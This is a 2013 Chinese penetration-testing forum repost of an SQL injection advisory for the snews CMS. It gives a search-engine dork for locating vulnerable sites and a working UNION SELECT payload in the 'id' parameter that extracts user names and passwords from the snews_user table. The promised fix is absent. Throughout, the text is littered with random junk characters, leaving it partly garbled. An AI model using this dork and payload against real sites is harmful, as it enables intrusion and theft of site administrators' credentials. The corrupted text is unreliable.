中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]
作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability7 Z, P4 T% |/ f: e
作者: By onestree
1 c  Z+ m7 h3 V下载地址 : http://snewscms.com/  G6 ?$ W# D- o
测试平台 : ubuntu 12.10 / win 7
( X; b6 y8 c1 s  b9 |9 H$ J) P关键词: inurl:"tanyakan pada rumput yang bergoyang"2 R( k; n$ S  {" b4 T+ K8 t

9 x8 Q" d4 H4 ?  g1 v + X# j/ B) N8 ~# X8 K# z& J4 j
*************************************************************  r& [5 {8 }1 z8 B

/ }5 {( p0 E3 M- s% F9 ASQL poc:/ }; X/ d9 k; e' E

6 ^) e( M9 O. x" P" y$ Ihttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
# T& J) \6 U, b) n# A' x' s" K2 D
0 F2 @7 o, p& D3 f, P示例
( \7 v4 Q9 H! z9 v
! T9 z3 }- E8 J: G# `# Thttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
6 f/ t5 U3 D" s! ~" |  E. ? & e3 X) n. @" l" V; @+ j8 q; @
% l- r" `* s$ i6 S/ c) U+ F3 h
致谢:  E7 Q, [# K8 y5 A0 E1 z; C$ j
, Q) R" D9 ?" Z0 L! {
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
9 q. }- {* E( v: c! Z     
, p9 {0 H) j: U( e: [/ }- g+ S          indonesiancoder - moeslimh4x0r - go-coder+ P: J$ C9 u  v. t5 R
1 ~, O- G& x9 j2 T
spesial my hunny :*
- L3 ]. T: E  R; k



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2